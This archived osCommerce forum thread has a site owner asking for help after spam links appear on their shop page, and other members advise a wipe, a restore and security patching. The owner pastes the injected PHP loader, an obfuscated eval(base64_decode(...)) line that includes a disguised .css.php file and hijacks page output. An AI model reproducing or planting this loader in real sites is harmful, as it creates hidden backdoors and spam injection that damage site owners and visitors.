fdh Posted April 29, 2010 Share Posted April 29, 2010 Hi there please can anyone help? A link has appeared on the bottome of the front page of the oscommerce catalog site underneath the copyright details which is obviously a security issue - please see http://www.scarlettribbon.co.uk/catalog/ This is the first site I have designed and new to all this and very concerned as to what I can do to remove it and stop anything else happening like this. Any help would be very much appreciated. Sorry forgot to say what it is :- a link to "tiki barber intern" Link to comment Share on other sites More sharing options...
♥mdtaylorlrim Posted April 29, 2010 Share Posted April 29, 2010 Hi there please can anyone help? A link has appeared on the bottome of the front page of the oscommerce catalog site underneath the copyright details which is obviously a security issue - please see http://www.scarlettribbon.co.uk/catalog/ This is the first site I have designed and new to all this and very concerned as to what I can do to remove it and stop anything else happening like this. Any help would be very much appreciated. Sorry forgot to say what it is :- a link to "tiki barber intern" Your problems extend much further than that...there several hundred lines of links below that link, in your page source... Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...? Link to comment Share on other sites More sharing options...
♥mdtaylorlrim Posted April 29, 2010 Share Posted April 29, 2010 You've been hacked. Completely wipe your site clean and restore from a known good backup. Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...? Link to comment Share on other sites More sharing options...
fdh Posted April 29, 2010 Author Share Posted April 29, 2010 Your problems extend much further than that...there several hundred lines of links below that link, in your page source... Is this the hacked code? Can I find out when the site was hacked? <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzMwL2QyODYwOTQyMDAvaHRkb2NzL3NjYXJsZXR0X3JpYmJvbi90ZXN0L3plbnBob3RvL3pwLWNvcmUvcGx1Z2lucy90aW55X21jZS9wbHVnaW5zL2FqYXhmaWxlbWFuYWdlci90aGVtZS9kZWZhdWx0L2ltYWdlcy9hY3Rpb24vc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?> <?php Link to comment Share on other sites More sharing options...
♥mdtaylorlrim Posted April 29, 2010 Share Posted April 29, 2010 Is this the hacked code? Can I find out when the site was hacked? More important is HOW the site was hacked. Then prevent it when you restore your site. You need to get the site off the internet until you fix it. And when you do get it fixed you should be sure all the security updates are applied. Only then allow it back on the internet. Most people will install osC and spend three weeks customizing it and THEN apply security updates. You should install osC in a PROTECTED directory (not accessible from the internet except by password) and get all the security updates installed before you allow access to it. Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...? Link to comment Share on other sites More sharing options...
fdh Posted April 29, 2010 Author Share Posted April 29, 2010 More important is HOW the site was hacked. Then prevent it when you restore your site. You need to get the site off the internet until you fix it. And when you do get it fixed you should be sure all the security updates are applied. Only then allow it back on the internet. Most people will install osC and spend three weeks customizing it and THEN apply security updates. You should install osC in a PROTECTED directory (not accessible from the internet except by password) and get all the security updates installed before you allow access to it. Thanks so much for your help - I'm afraid I've been thrown in a bit at the deep end..Is there any thing else to follow as well as your link "how to secure your site" or does this cover it. Thanks Link to comment Share on other sites More sharing options...
♥mdtaylorlrim Posted April 29, 2010 Share Posted April 29, 2010 Thanks so much for your help - I'm afraid I've been thrown in a bit at the deep end..Is there any thing else to follow as well as your link "how to secure your site" or does this cover it. Thanks That is the basics. Read and follow this forum closely as most security problems will be announced here quite soon after discovery. Likely the patches will also be provided here first. Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...? Link to comment Share on other sites More sharing options...
fdh Posted April 29, 2010 Author Share Posted April 29, 2010 That is the basics. Read and follow this forum closely as most security problems will be announced here quite soon after discovery. Likely the patches will also be provided here first. Thankyou - I'm very grateful for all your help. Link to comment Share on other sites More sharing options...
chooch Posted April 29, 2010 Share Posted April 29, 2010 It may be that your server/host is not compromised but it is your PC that has a virus: READ THIS Upon receiving fixes and advice, too many people don't bother to post updates informing the forum of how it went. Until of course they need help again on other issues and they come running back! Why receive the information you require in good faith for free, only to then have the attitude to ignore the people who gave it to you? There's no harm in saying, 'Thanks, it worked'. On the contrary, it creates a better atmosphere. CHOOCH Link to comment Share on other sites More sharing options...
fdh Posted April 29, 2010 Author Share Posted April 29, 2010 It may be that your server/host is not compromised but it is your PC that has a virus: READ THIS Thanks for that - I've run a scan and nothing showing up - can I assume that it's not the PC? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.